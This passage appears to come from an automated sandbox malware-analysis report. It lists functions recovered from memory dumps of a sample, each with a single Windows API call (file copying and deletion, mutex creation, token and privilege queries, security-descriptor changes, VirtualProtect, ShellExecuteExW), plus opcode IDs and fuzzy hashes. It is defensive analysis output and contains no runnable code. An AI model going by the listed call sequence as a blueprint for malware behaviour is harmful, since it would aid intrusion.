Instruction Fuzzy Hash: 3F317C6140E3C06FD3138B318C65B22BFB4EF47610F0A41DBE884CF5A3D229A919C762

Uniqueness

Uniqueness Score: -1.00%

Function 006D1022, Relevance: 1.6, APIs: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 006D10AE

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 7dc237a1c610a5dc8a170432c4b42e51f2fdf4a37afcd88bda51dd1a7581ceab
Instruction ID: 710258379bd3da442df0ffdd5401f2abbb9cd9709dbfd85436e49c0d1eea5ac4
Opcode Fuzzy Hash: 7dc237a1c610a5dc8a170432c4b42e51f2fdf4a37afcd88bda51dd1a7581ceab
Instruction Fuzzy Hash: 1D31507150D3C09FD7138B259C65BA2BFB8AF17210F0D84DBD984CF2A3E6659849C762

Uniqueness

Uniqueness Score: -1.00%

Function 006D0C86, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 006D0D2D

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 33e0c6b7a3f9b5ced764fe7e55f88b5a139bcd61cf7fcc0bfe0ba7fcccbe3e26
Instruction ID: 4f0e464bc2e2555cab1b76b18f82433faea0f5d6395ace9cdf1fa9559c737457
Opcode Fuzzy Hash: 33e0c6b7a3f9b5ced764fe7e55f88b5a139bcd61cf7fcc0bfe0ba7fcccbe3e26
Instruction Fuzzy Hash: 99318171509784AFE712CB65DC45B96BFB8EF06310F08849BE984CB293D365A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 0013AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 0013ACD8

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 34931aa3077d22e6941874095ad308fc58071fcfd436057aed68019e3664b4bd
Instruction ID: 1e6e7a8a90ec9a3ad37eedf0470659a8cfae199f2d779fd82903633e33dc3764
Opcode Fuzzy Hash: 34931aa3077d22e6941874095ad308fc58071fcfd436057aed68019e3664b4bd
Instruction Fuzzy Hash: B53191755053849FE722CF21CC45FA2BFA8EF06710F08849AE985CB193D364E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D0774, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D0808

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 6139600d0d88667d2f6c75e0505124f5d96c1447a0a9c4a78de1a64b9bc7c23d
Instruction ID: f40c95659e598162ffe1cb6550f630b03c1ae6ceadbd34184c57888dc81e040a
Opcode Fuzzy Hash: 6139600d0d88667d2f6c75e0505124f5d96c1447a0a9c4a78de1a64b9bc7c23d
Instruction Fuzzy Hash: 3521B7B2509780AFE712CB20DC45B96BFB8EF06320F0984DBE985DF193D2649945C761

Uniqueness

Uniqueness Score: -1.00%

Function 006D00B1, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D0149

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: f82ad83e770c424f39bcc9f87b279900cc324b16ef2ba516c28b747a2e675914
Instruction ID: dae3488f24087f744c44323ebe68d319a0451176fe2147d82de9eb41a480fc5c
Opcode Fuzzy Hash: f82ad83e770c424f39bcc9f87b279900cc324b16ef2ba516c28b747a2e675914
Instruction Fuzzy Hash: 4B317571509380AFEB22CF65DC55F96BFB8EF06310F0885DBE9849F153D265A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D036D, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 006D0406

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0dc63a464e75ad6f5792c364ebda99c4a0ea928895b32b078d3f48bb86475686
Instruction ID: 9bd71f75b1eda7d4a6f991e94ce0ecbc41a7ca1200ea96fd6548e9b080cd17aa
Opcode Fuzzy Hash: 0dc63a464e75ad6f5792c364ebda99c4a0ea928895b32b078d3f48bb86475686
Instruction Fuzzy Hash: 24316F715093C09FE7138B659C55B92BFB8EF17310F0D84DBD984CB2A3D6649808C762

Uniqueness

Uniqueness Score: -1.00%

Function 006D1473, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D1508

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 403cfa61eea2f361803b81b6fa845eef9f34a599aab5fb86f43848ae1f490015
Instruction ID: b07fa71e728f7695404a63e1f475e72f7ec5b11faded7c5a5f59349b1b71a6fe
Opcode Fuzzy Hash: 403cfa61eea2f361803b81b6fa845eef9f34a599aab5fb86f43848ae1f490015
Instruction Fuzzy Hash: 9D21B472505380AFEB21CF21DC45F97FBB8EF06310F08849BF945CB152D265A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D0F48, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,?,?), ref: 006D0FE2

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InfoNamedSecurity
String ID:
API String ID: 1443090519-0
Opcode ID: 594e66847592f3ecc721e365e576c7029976f73cf660f883ac4b3b00ee72ac8f
Instruction ID: 719a919c80be309446d74c530339ee061920bd0f47b4e32781f701970d2bcb60
Opcode Fuzzy Hash: 594e66847592f3ecc721e365e576c7029976f73cf660f883ac4b3b00ee72ac8f
Instruction Fuzzy Hash: E7314C756047849FE721CF25DC44B92FBE8EF16710F19849AED48CB362E365E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1CBA, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 006D1D37

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 15e2702ddecba9e60be128fd07a387a16089f5d75d450d6e82f96e911a48b8e5
Instruction ID: d465d06e18d26879c8ab7068226364bd0f54612a68479f99f56854e58a7d5816
Opcode Fuzzy Hash: 15e2702ddecba9e60be128fd07a387a16089f5d75d450d6e82f96e911a48b8e5
Instruction Fuzzy Hash: 3421CF72500304EFFB21DF61CC45FAAFBADEF05320F04896AF945CA651D671E9099BA1

Uniqueness

Uniqueness Score: -1.00%

Function 006D1978, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D1A0D

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 7b6fc64d729a9fb5abbc9cd83f78d654093b8bd02fb5436adfc78f20f10bee49
Instruction ID: 976adad890d04d649d8b04be7df1d3d36b8ec5d82f609f6356a1c277a56012fe
Opcode Fuzzy Hash: 7b6fc64d729a9fb5abbc9cd83f78d654093b8bd02fb5436adfc78f20f10bee49
Instruction Fuzzy Hash: 39212CB6409780AFE712CB159C51BA3BFA8EF47720F0881DBF9848F293D264A905C771

Uniqueness

Uniqueness Score: -1.00%

Function 006D1D95, Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006D1E1C

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: f5fe5e0680cba11b199c2962e601cfd4b60a20bdddecbfb78fc73dbc39995b55
Instruction ID: 6b0d5c0e410c1b0012c392839bc32880f4dcbbf6d9aeb5e7a571942f2ff0dc5c
Opcode Fuzzy Hash: f5fe5e0680cba11b199c2962e601cfd4b60a20bdddecbfb78fc73dbc39995b55
Instruction Fuzzy Hash: 4A21DE766093C09FE712CB25DC55B92BFA4EF03210F0984DADD88CF2A3D661A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D18A2, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 006D1921

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d91538ed65b1dd8681bbe4ebdd636402f0377b37008c81d2ef21fdc08d8f4891
Instruction ID: 47918587e0d505ebd46d12daea7daf9b2a8184057d8bd4e78a3e707081dae2c3
Opcode Fuzzy Hash: d91538ed65b1dd8681bbe4ebdd636402f0377b37008c81d2ef21fdc08d8f4891
Instruction Fuzzy Hash: 2121AE71900300AFEB20CF65CC85BA6FBE8EF09710F04846AE9498F342D371E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1A48, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D1AD9

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d90ed6230da64d9cfb7f62c948cab6b1972d70c5c6a8520b03cb0bb02a1b1f98
Instruction ID: 3081b432ce25b06bd034ac2364ea096bd10f6c4a34b6c2b4001d51e546829fff
Opcode Fuzzy Hash: d90ed6230da64d9cfb7f62c948cab6b1972d70c5c6a8520b03cb0bb02a1b1f98
Instruction Fuzzy Hash: 5C21A172509380AFE722CF11DC45F96BFB8EF06310F0984DBE9449B193C265A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 006D01D6, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 006D0248

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fd3b77eb9cbb7dd7d592eca5f7f5fd8180f8456431a2c1360fa1b949ec4edc20
Instruction ID: e8e08985787db77130ba20381183d73e1b2c305cea0b052033c5be263d9fba80
Opcode Fuzzy Hash: fd3b77eb9cbb7dd7d592eca5f7f5fd8180f8456431a2c1360fa1b949ec4edc20
Instruction Fuzzy Hash: 6B210172500304EFFB21CF61DC45FAAFBA8EF04710F08886AFE458A251D631E9099B71

Uniqueness

Uniqueness Score: -1.00%

Function 0013AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0013ABD5

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 22e33eac278c038063b336e0ca002941211aec56e5401cd7065ba015b3af0595
Instruction ID: 62f6ab7330505a2959feadf926200ae9be37eeb5020110b9e892c033ee914e34
Opcode Fuzzy Hash: 22e33eac278c038063b336e0ca002941211aec56e5401cd7065ba015b3af0595
Instruction Fuzzy Hash: 9121AE72500304EFFB20DF11DC85FAAFBACEF04750F04855AFA859A245D674E9088AB2

Uniqueness

Uniqueness Score: -1.00%

Function 006D08FF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 006D097A

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: a59e9b2b0b401097c7e62585168c0c600d39d59b1c59272918ddbb77ff1ae399
Instruction ID: f2e6b9b01c10736e48900b285527aaecf2e08c573a6649bf8fb0891d8afd38b0
Opcode Fuzzy Hash: a59e9b2b0b401097c7e62585168c0c600d39d59b1c59272918ddbb77ff1ae399
Instruction Fuzzy Hash: 9F2160755093C09FEB12CB25DC54B92BFA4EF17224F0984DBE9848F253D2659808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D0CBA, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 006D0D2D

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 33a321dbb5f308712e6840d3cf97c73aee7b944a542540221e104f9ef68a4a35
Instruction ID: 7dd9015f42b1f9a5ff41f0f4e16248a1f5b0f6fece7d3a9d48d5048c12ba76a9
Opcode Fuzzy Hash: 33a321dbb5f308712e6840d3cf97c73aee7b944a542540221e104f9ef68a4a35
Instruction Fuzzy Hash: 0F217971A00644AFF720DF65DC85BA6FBE9EF08750F14846AE9498B382D671E904CA62

Uniqueness

Uniqueness Score: -1.00%

Function 006D149E, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D1508

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 71ba2305a2237476120914f74049088c8535fc7149a0a1bc4a8306fbffadc2f4
Instruction ID: cd8bbe4380abc0bad7fb4088f6729f82d21d21e0c597c5c3da03af2aad1ed6c7
Opcode Fuzzy Hash: 71ba2305a2237476120914f74049088c8535fc7149a0a1bc4a8306fbffadc2f4
Instruction Fuzzy Hash: 8111AFB2500304EFEB21CF55DC85FAAFBECEF45720F04856AF90ACA241D674A9048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0013AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 0013ACD8

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a01e5186d8e20061c8990437a5bb4d1c0e7948dc376fdbd3821144dc39deb8b1
Instruction ID: d0d65213e7593390e51384f715285f9cbc201be3507a947fe2a8579ef432e324
Opcode Fuzzy Hash: a01e5186d8e20061c8990437a5bb4d1c0e7948dc376fdbd3821144dc39deb8b1
Instruction Fuzzy Hash: 78219D75600704AFEB20CF15CC85F66F7ECEF04750F48855AE989DB651D760E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 006D0F76, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,?,?), ref: 006D0FE2

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InfoNamedSecurity
String ID:
API String ID: 1443090519-0
Opcode ID: de17c8e23307718219a90dab78d6a52656df8d00521ab82b53de112f5f7b82b7
Instruction ID: 50f62f79063e30b2cf9556f55648c07b2cb872300aaeb2741dbf3f0e0177a78c
Opcode Fuzzy Hash: de17c8e23307718219a90dab78d6a52656df8d00521ab82b53de112f5f7b82b7
Instruction Fuzzy Hash: B3214A71A006449FEB30CF65C884BA2FBE9EF04710F18846ADD49CB352E770E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D02A6, Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006D0325

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8d73f8cfe5b69e36848646280bfab1a8f4bdd0f60835f0a6e2b7b6eb6958ac3c
Instruction ID: d93bd1984cfc9ec215679b34a8f9d75124587276d851d14f2cc21704d1b5a270
Opcode Fuzzy Hash: 8d73f8cfe5b69e36848646280bfab1a8f4bdd0f60835f0a6e2b7b6eb6958ac3c
Instruction Fuzzy Hash: 3B21C5765087C09FEB128F219C55BA2FFB0EF06320F0D84DED9854B253D2219508D771

Uniqueness

Uniqueness Score: -1.00%

Function 0013B46D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0013B4E9

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 9f7b52b0ccbf4d49977795f76b3cbccb531f8c830e79991d33974032ca24d390
Instruction ID: 38a4ed9749859d247920c72e91636f23efee0d9d44415aa2137cff3a0a5d7bea
Opcode Fuzzy Hash: 9f7b52b0ccbf4d49977795f76b3cbccb531f8c830e79991d33974032ca24d390
Instruction Fuzzy Hash: 5A2193715083849FDB228E15DC85B62BFE8EF56710F08808AED85CB253E365E908C771

Uniqueness

Uniqueness Score: -1.00%

Function 006D00EA, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D0149

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c8e6260cdc646a67ed4b52572944cfa72bffddb9e226fbcc72ed945240d35ea8
Instruction ID: 08192df069e47f8ad160ec6952daf01fb27e1968e0bbf4b8f06d96fa3d2381dd
Opcode Fuzzy Hash: c8e6260cdc646a67ed4b52572944cfa72bffddb9e226fbcc72ed945240d35ea8
Instruction Fuzzy Hash: 4D11BF72500700EFFB21CF51DC85FABFBA8EF04720F18846AED099A291D671A9458BB1

Uniqueness

Uniqueness Score: -1.00%

Function 006D1FA9, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 006D201D

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7b9870c007e1aee6387eab04f8ddbaff90c3e19978fa3d30aed9cd018363f495
Instruction ID: 290dfef6b6241ee2917789ff91375651725fdb32a8f209913725558cd3e1045b
Opcode Fuzzy Hash: 7b9870c007e1aee6387eab04f8ddbaff90c3e19978fa3d30aed9cd018363f495
Instruction Fuzzy Hash: 84218C715093C09FDB228F25CC55A92BFB0EF17210F0984DBE9848B263D265A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013B3C0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 0013B42C

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: c77afe1f3008fc9a80095a4bb1f1d132a1e8ce1ebec060eada8888743f544cb0
Instruction ID: ce0ff87edabae2f11248975be7a2b04c85ee7d755d8a21591933088641c928e4
Opcode Fuzzy Hash: c77afe1f3008fc9a80095a4bb1f1d132a1e8ce1ebec060eada8888743f544cb0
Instruction Fuzzy Hash: 74212E715093C49FD712CB25DC85B92BFE4EF16610F0984EAD989CF263D265A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D07B2, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D0808

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: dfcf91eb609fe73e9bad2ba751684a9143cd5af63538c9f5e13349af3f260c1d
Instruction ID: 05becdc5225ebf82b72364f28557d482080c7447517cb69a108a4052fd0aa10a
Opcode Fuzzy Hash: dfcf91eb609fe73e9bad2ba751684a9143cd5af63538c9f5e13349af3f260c1d
Instruction Fuzzy Hash: 3311C271900300EFFB20CF15DC85BAAFB9CEF05720F1484ABED09DB281D674A9059AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0013A61A

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bf3fed853942665d64b3403f51dac9b325f6d3094bacd3b21227f743b78fa1cb
Instruction ID: bfb4c458890a3f5a906a3fd2651c9e25d23bb9d5c2cbe40040694b9b486476f2
Opcode Fuzzy Hash: bf3fed853942665d64b3403f51dac9b325f6d3094bacd3b21227f743b78fa1cb
Instruction Fuzzy Hash: 49117271409380AFDB228F51DC44B62FFF4EF46710F08849AED858B552C375A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1BE4, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 006D1C40

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 13133421c748731d07aa238b302141d50c956a5e08ca31d016c27c67b099b0b8
Instruction ID: 1a64b1c42e4bd33fa98b41aac46852c6e69e61f490f37045baf06d679c7f3550
Opcode Fuzzy Hash: 13133421c748731d07aa238b302141d50c956a5e08ca31d016c27c67b099b0b8
Instruction Fuzzy Hash: B51182755093849FD712CF25DC85B92BFA8EF06260F0884EBED49CF252D275E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1A7A, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D1AD9

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f56dfe3c8579741d02d6c0768a0389db8f6564e828b0f7e33be015537f8dca65
Instruction ID: b31d85a7c1833a00f765ec9e411b0557aaa1432317995fddf4c82bffd4e86ff7
Opcode Fuzzy Hash: f56dfe3c8579741d02d6c0768a0389db8f6564e828b0f7e33be015537f8dca65
Instruction Fuzzy Hash: 2711C172500700EFEB21CF51DC85FA6FBA8EF05720F18846BEA099A241D6B1A9458BB1

Uniqueness

Uniqueness Score: -1.00%

Function 006D1129, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006D118B

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3e864225fadfc2291bbac41b2641525e025c2dfafda8670602b5596a4c020318
Instruction ID: 1f41c39687f540a173cbf99bc02ad62adeabdd6f3f19461b00acb42caf3d1de3
Opcode Fuzzy Hash: 3e864225fadfc2291bbac41b2641525e025c2dfafda8670602b5596a4c020318
Instruction Fuzzy Hash: FF119375908380AFDB11CF25DC85B92FFE8EF06210F0984AAED45CF253D2759849CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013A1F4, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(?,572F4E5B,00000000), ref: 0013A298

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: ada131067b28bfa3a96169c4aeb0650e573cd411b98e1bb6513cf39b27a48906
Instruction ID: 51c7bad487b8a591f9b3de53e9164b29fde612d7f4832882401124a1d26bac31
Opcode Fuzzy Hash: ada131067b28bfa3a96169c4aeb0650e573cd411b98e1bb6513cf39b27a48906
Instruction Fuzzy Hash: 4B210A3550E3C08FD7528B258894751BFB0AF13220F4D85DBD9C9CF2A3C669990ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013A65A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0013A6CC

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 357d05a5bdacb973bcb336cef1fbf7f1430286d447b4b8c97de689e3a9e68b01
Instruction ID: fe87fcf61ec1a8893a444337020461bc93847e55ce06f2e0e08816fd0c04ae61
Opcode Fuzzy Hash: 357d05a5bdacb973bcb336cef1fbf7f1430286d447b4b8c97de689e3a9e68b01
Instruction Fuzzy Hash: FC116A7540D3C49FD7128B25CC95A52BFB4EF07220F0E80DBD9858F2A3D2695908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 006D21B9, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 006D221C

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: 77b9be635817952b443037ca62896075d650b25bbcd52d2c130f52f65eb23d10
Instruction ID: b8a9a36968f76e18c8939e31e74bbe657eb52ed7f09b59096cdf147e18990552
Opcode Fuzzy Hash: 77b9be635817952b443037ca62896075d650b25bbcd52d2c130f52f65eb23d10
Instruction Fuzzy Hash: 661104755097C09FD7128B25DC55B52BFB4EF17310F0880DBED848B2A3D265A909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D233B, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 006D23A5

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0d9c9899e2120fe5aa1b33578abbf57c1d0bdc27c48034505c57304c6a6a9c86
Instruction ID: 573e0506e307131c583d48d1d0b97b6b48e17f49cf490f3f94c9955490682577
Opcode Fuzzy Hash: 0d9c9899e2120fe5aa1b33578abbf57c1d0bdc27c48034505c57304c6a6a9c86
Instruction Fuzzy Hash: B511EF72508380AFDB228F11DC45B52FFB4EF16320F0884DEED858B263C276A818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1066, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 006D10AE

